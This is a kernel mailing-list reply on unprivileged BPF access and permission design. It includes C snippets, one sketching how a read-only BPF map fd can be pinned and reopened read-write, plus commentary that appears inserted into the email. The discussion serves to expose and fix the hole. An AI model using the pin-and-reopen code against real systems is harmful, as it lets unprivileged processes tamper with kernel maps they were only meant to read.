Re: [PATCH v2 bpf-next 1/4] bpf: unprivileged BPF access via /dev/bpf
From: Andy Lutomirski <luto@kernel.org>
Date: 2019-08-22 15:16:28

On Thu, Aug 22, 2019 at 7:17 AM Daniel Borkmann [off-list ref] wrote:
> On 8/7/19 7:24 AM, Andy Lutomirski wrote:
>> On Mon, Aug 5, 2019 at 6:11 PM Alexei Starovoitov [off-list ref] wrote:
>>> On Mon, Aug 05, 2019 at 02:25:35PM -0700, Andy Lutomirski wrote:
>>>> It tries to make the kernel respect the access modes for fds. Without this patch, there seem to be some holes: nothing looked at program fds and, unless I missed something, you could take a readonly fd for a program, pin the program, and reopen it RW.
>>>
>>> I think it's by design. iirc Daniel had a use case for something like this.
>>
>> That seems odd. Daniel, can you elaborate?
>
> [ ... catching up late. ] Not from my side, the change was added by Chenbo back then for Android use-case to replace xt_qtaguid and xt_owner with BPF programs and to allow unprivileged applications to read maps. More on their architecture:
> https://source.android.com/devices/tech/datausage/ebpf-traffic-monitor
>
> From the cover-letter:
>
>   [...] The network-control daemon (netd) creates and loads an eBPF object for network packet filtering and analysis. It passes the object FD to an unprivileged network monitor app (netmonitor), which is not allowed to create, modify or load eBPF objects, but is allowed to read the traffic stats from the map. [...]

I suspect that this use case is, in fact, mostly broken in current kernels. An unprivileged process with a read-only fd to a bpf map can BPF_OBJ_PIN the map and then re-open it read-write. As far as I can tell, the only thing mitigating this is that it won't work unless the attacker has write access to some directory in bpffs.
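
The pin-and-reopen sequence described above can be sketched roughly as follows. This is an illustration under stated assumptions, not a tested exploit: the helper names `sys_bpf` and `pin_and_reopen_rw` are hypothetical, the pin path is chosen by the caller, and whether the second call succeeds depends on the kernel version and on write access to a bpffs directory.

```c
#include <linux/bpf.h>
#include <stdint.h>
#include <string.h>
#include <sys/syscall.h>
#include <unistd.h>

/* Thin wrapper around the raw syscall; glibc does not export bpf(). */
static int sys_bpf(int cmd, union bpf_attr *attr)
{
    return (int)syscall(__NR_bpf, cmd, attr, sizeof(*attr));
}

/*
 * Hypothetical helper: pin the object behind ro_fd at pin_path, then
 * reopen the pinned object without any access restriction flags.
 * Returns the new fd on success, or -1 with errno set on failure.
 */
static int pin_and_reopen_rw(int ro_fd, const char *pin_path)
{
    union bpf_attr attr;

    /* Step 1: BPF_OBJ_PIN the object referenced by the (read-only) fd. */
    memset(&attr, 0, sizeof(attr));
    attr.pathname = (uint64_t)(uintptr_t)pin_path;
    attr.bpf_fd = (uint32_t)ro_fd;
    if (sys_bpf(BPF_OBJ_PIN, &attr) < 0)
        return -1;

    /*
     * Step 2: BPF_OBJ_GET on the same path. Leaving file_flags at 0
     * (neither BPF_F_RDONLY nor BPF_F_WRONLY) asks for read-write access.
     */
    memset(&attr, 0, sizeof(attr));
    attr.pathname = (uint64_t)(uintptr_t)pin_path;
    attr.file_flags = 0;
    return sys_bpf(BPF_OBJ_GET, &attr);
}
```

A caller would pass the read-only map fd it was handed and a path inside a bpffs directory it can write to; if no such directory exists, the first step fails, which is the mitigation mentioned above.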

>> Trusted by whom? In a non-nested container, the container manager *might* be trusted by the outside world. In a *nested* container, unless the inner container management is controlled from outside the outer container, it's not trusted. I don't know much about how Facebook's containers work, but the LXC/LXD/Podman world is moving very strongly toward user namespaces and maximally-untrusted containers, and I think bpf() should work in that context.
>
> [...] and if we opt-in with CAP_NET_ADMIN, for example, then it should ideally be possible for that container to install BPF programs for mangling, dropping, forwarding etc as long as it's only affecting its /own/ netns like the rest of networking subsystem controls that work in that case. I would actually like to get to this at some point and make it more approachable as long as there is a way for an admin to /opt into it/ via policy (aka not by default).

For better or for worse, I think this would need a massive re-architecting of the way bpf filtering works. bpf filters attach to cgroups, which aren't scoped to network namespaces at all. So we need a different permission model.
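
To make the scoping point concrete, here is a minimal sketch of a cgroup attach request through the raw bpf() syscall. The helper name `attach_cgroup_ingress` is hypothetical, and `BPF_CGROUP_INET_INGRESS` is just one example attach type. The thing to notice is that the request names a cgroup fd as its target and has no field for a network namespace.

```c
#include <linux/bpf.h>
#include <stdint.h>
#include <string.h>
#include <sys/syscall.h>
#include <unistd.h>

/*
 * Hypothetical helper: attach an already-loaded program to a cgroup.
 * cgroup_fd is expected to be an fd for an open cgroup v2 directory.
 * Returns 0 on success, or -1 with errno set on failure.
 */
static int attach_cgroup_ingress(int prog_fd, int cgroup_fd)
{
    union bpf_attr attr;

    memset(&attr, 0, sizeof(attr));
    attr.target_fd = (uint32_t)cgroup_fd;       /* the cgroup, not a netns */
    attr.attach_bpf_fd = (uint32_t)prog_fd;     /* the program to attach */
    attr.attach_type = BPF_CGROUP_INET_INGRESS; /* example attach point */

    return (int)syscall(__NR_bpf, BPF_PROG_ATTACH, &attr, sizeof(attr));
}
```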

> Thinking out loud, I'd love some sort of a hybrid, that is, a mixture
> of CAP_BPF_ADMIN and customizable seccomp policy. Meaning, there could
> be several CAP_BPF type sub-policies e.g. from allowing everything
> (equivalent to the /dev/bpf on/off handle or CAP_SYS_ADMIN we have
> today) down to programmable user defined policy that can be tailored
> to specific needs like granting apps to BPF_OBJ_GET and BPF_MAP_LOOKUP
> elements or granting to load+mangle a specific subset of maps (e.g.
> BPF_MAP_TYPE_{ARRAY,HASH,LRU_HASH,LPM_TRIE}) and prog types (...) plus
> attaching them to their own netns, and if that is untrusted, then same
> restrictions/mitigations could be done by the verifier as with
> (current) unprivileged BPF, enabled via programmable policy as well.
> We wouldn't make any static/fixed assumptions, but allow users to
> define them based on their own use-cases. Haven't looked how feasible
> this would be, but something to take into consideration when we rework
> the current [admittedly suboptimal all-or-nothing] model we have. Is
> this something you had in mind as well for your wip proposal, Andy?

Hmm. Fine-grained seccomp stuff like this is very much in scope for the seccomp discussion that's happening at LPC this year. Unfortunately, I'm not there, but I'm participating via the mailing list.

I also finally finished typing a very rough draft of my bpf ideas. I'll email them out momentarily in a separate email. I think it should come fairly close to doing what you want.
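
For readers trying to picture the "programmable user defined policy" idea quoted above, here is a purely illustrative toy model. Nothing like `struct bpf_policy` exists in the kernel; the struct, both helper functions, and `reader_policy` are hypothetical names invented for this sketch, and it does not represent the draft proposal mentioned in this message. It only shows how a policy might whitelist bpf() commands and map types.

```c
#include <linux/bpf.h>
#include <stdbool.h>
#include <stdint.h>

/* Hypothetical policy record; not a kernel structure. */
struct bpf_policy {
    uint64_t allowed_cmds;      /* bit N set: bpf() command N is permitted */
    uint64_t allowed_map_types; /* bit N set: map type N may be created */
};

/* True if the policy permits the given bpf() command number. */
static bool policy_allows_cmd(const struct bpf_policy *p, unsigned int cmd)
{
    return cmd < 64 && ((p->allowed_cmds >> cmd) & 1);
}

/* True if the policy permits creating a map of the given type. */
static bool policy_allows_map_type(const struct bpf_policy *p,
                                   unsigned int map_type)
{
    return map_type < 64 && ((p->allowed_map_types >> map_type) & 1);
}

/*
 * Example policy for a read-only consumer: it may open pinned objects
 * and look up map elements, but may not create maps of any type.
 */
static const struct bpf_policy reader_policy = {
    .allowed_cmds = (1ULL << BPF_OBJ_GET) | (1ULL << BPF_MAP_LOOKUP_ELEM),
    .allowed_map_types = 0,
};
```

A less restricted policy in this model would additionally set bits such as `BPF_MAP_CREATE` in `allowed_cmds` and `BPF_MAP_TYPE_HASH` or `BPF_MAP_TYPE_ARRAY` in `allowed_map_types`.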